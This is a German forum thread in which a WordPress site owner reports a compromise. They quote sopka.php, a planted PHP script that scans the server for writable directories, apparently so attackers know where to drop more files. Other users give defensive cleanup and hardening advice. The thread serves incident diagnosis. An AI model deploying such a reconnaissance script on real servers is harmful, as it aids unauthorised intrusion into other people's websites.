Server Routinescan: csc.php und sopka.php

#1 Hallo zusammen,

bei einem Routinescan hat mein Hostinganbieter Schadcode in vielen php Dateien entdeckt. Unter anderem in der Datei: csc.php

Beim genaueren hinsehen ist mir dann noch diese Datei aufgefallen: sopka.php - die ebenfalls ohne mein zutun hochgeladen wurde.

Inhalt der sopka.php:

Zitat

<?php
@ini_set('max_execution_time',0);
@set_time_limit(0);
function AllDir($Folder, &$Files){
$result = scandir($Folder);
foreach($result as $file){
if ($file == '.' || $file == '..') continue;
$FullPath = $Folder . '/' . $file;
$Files[] = $FullPath;
if (is_dir($FullPath)) AllDir($FullPath, $Files);}}
$StartDir = getcwd();
$Files = array();
$maxlen='hremjo';
AllDir($StartDir, $Files);
foreach($Files as $wf) { //echo $wf."\n";
if (is_dir($wf) && is_writable($wf)){
if (strlen($maxlen)<=strlen($wf))$maxlen=$wf;
//echo $wf."\n";
}}echo 'rahui#',$maxlen,'#rahui';
?>

Die mit Schadcode infizierten Dateien wurden immer im den untersten Verzeichnissen einer Domain untergebracht. Ich vermute, dass die Dateien über irgendein fehlerhaftes Plugin (Wordpress) eingeschleust wurden und auf Grund der verwendeten Wörter vermute ich weiter, das es sich bei dem Angreifern mit einem russichen Background handelt.

Hat irgendjemand schon mal Erfahrung mit diesen Dateien oder ähnlichen Problemen gehabt?

Grüße
RA

PS: Laut log wurde wohl auch eine wp-info.php erstellt, die ich nun allerdings schon gelöscht habe.

#2 Dazu gabs vor kurzem hier etwas:
http://board.protecus.de/t43031.htm
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#3

Zitat

Xeper postete
Dazu gabs vor kurzem hier etwas:
http://board.protecus.de/t43031.htm

Hi! In dem von dir benannten Beitrag wird aber leider in keinster Weise auf die genannten Dateien eingegangen. Zumal ich auch kein Contact Form 7 oder NextGen verwende..

#4 Kann sein, aber Wordpress ist halt nicht von großartiger Qualität, ich selber würde niemals PHP code einsetzen den ich nicht selber komplett verstehe (code revision).
Besonders bei PHP ist das ein Problem, die Sprache selbst ist ja schon großer Mist aber leider sind die meisten PHP coder auch keine echten Programmierer.
(So kommt mir das jedenfalls vor)
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#5

Zitat

RevengeAngel postete
[In dem von dir benannten Beitrag wird aber leider in keinster Weise auf die genannten Dateien eingegangen.

Muss auch nicht. Der Hintergrund ist der gleiche. Das Problem kann verschiedene Ursachen haben wie kompromittierter FTP-Zugang oder fehlerhafte Plugins. Da Du ja vermutlich in den Webserver-Logs gesehen hast, dass eine wp-info.php erstellt wurde, kannst Du dort auch nachvollziehen, wie sie angelegt wurde.

Nach einer Google-Abfrage handelt es sich hierbei um einen Exploit, der möglicherweise die .htaccess modifiziert. Die solltest Du auf jeden Fall auch noch überprüfen.

Und ansonsten Standard: prüfe, ob die die aktuelle Wordpress-Version hast. Prüfe, ob alle Plugins auf dem aktuellen Stand sind (und prüfe vor allem bei schon länger nicht mehr aktualisierten Plugins, ob es dafür bekannte Schwachstellen gibt). Prüfe die Ordner- und Dateiberechtigungen (der einzige Ordner mit 777 sollte der Upload-Ordner sein). Benutze ein Security-Tool (ich hab derzeit ganz gute Erfahrungen mit Wordfence)
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser

#6

Zitat

Benutze ein Security-Tool (ich hab derzeit ganz gute Erfahrungen mit Wordfence)

Aber du musst zugeben, es ist sehr traurig wenn man für irgendwelche dämlichen Web Frameworks nun auch noch weitere Tools brauch - die die Löcher vom ersten stopfen.

Nur weil die jungs da nicht coden können oder was, sich nicht an Standards halten...
sowas würde ich schon längst in die Tonne treten.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#7 Immerhin gibt es solche Tools
Es werden hiermit ja keine Löcher in dem Sinne geschlossen, sondern man kann damit zum Beispiel herausfinden, ob irgendwelche Core-Dateien unterschiedlich zur Originalversion sind (so kann man unerlaubte Datei-Manipulationen schneller feststellen). Oder sie rüsten Sicherheitsfeatures nach wie bspw. eine 2-Faktor-Authentifizierung oder eine Art fail2ban.
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser

#8

Zitat

Immerhin gibt es solche Tools
...
sondern man kann damit zum Beispiel herausfinden, ob irgendwelche Core-Dateien unterschiedlich zur Originalversion sind

Ja die Leute scheinen einfach nicht zu verstehen wie das läuft, wordpress ist so oft immer in den News irgendwo:
http://www.golem.de/news/cross-site-scripting-kritische-wordpress-luecke-betrifft-86-prozent-der-seiten-1411-110750.html

Das das noch genutzt wird wundert mich - da würde man den Leuten doch am liebsten empfehlen Finger vom Kbd zu lassen und sich einfach ne Zeitung zu kaufen das klappt besser.
__________
E-Mail: therion at ninth-art dot de
IRC: megatherion @ Freenode

#9 Dabei hat Wordpress seit einiger Zeit sogar die Funktion, sich automatisch zu aktualisieren. Was dann sinnvoll ist, wenn man eben nicht täglich sein Wordpress überprüfen möchte/kann. Gerade in solchen Situationen könnte das Problem binnen kurzer Zeit behoben sein. Ich wüsste nur wenige Gründe, warum man das nicht aktiviert: entweder weil man seine Wordpress-Installation so modifiziert hat, dass ein Update die Modifikationen überschreiben würde. Oder weil man Plugins einsetzt, die nach einem Update potentiell nicht mehr funktionieren. Oder weil man Wordpress geschäftlich nutzt (bspw. Nachrichtenportale wie ingame.de) und somit zuerst einen Test machen muss. Dann hat man aber hoffentlich ein Team, dass das Update zeitnah testet und einspielt - und nicht wochenlang damit wartet.

Im Übrigen wird natürlich auch Malware in raubkopierten Themes und Plugins für verschiedene CMS verbreitet. Betrifft auch, aber nicht nur, Wordpress: http://www.heise.de/newsticker/meldung/CryptoPHP-Hinterlistiger-Schadcode-hat-zehntausende-Server-infiziert-2467962.html
Allerdings ist dabei die Sicherheitslücke nicht im CMS selbst, sonder PEBKAC.
__________
Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren.
Der Grabsteinschubser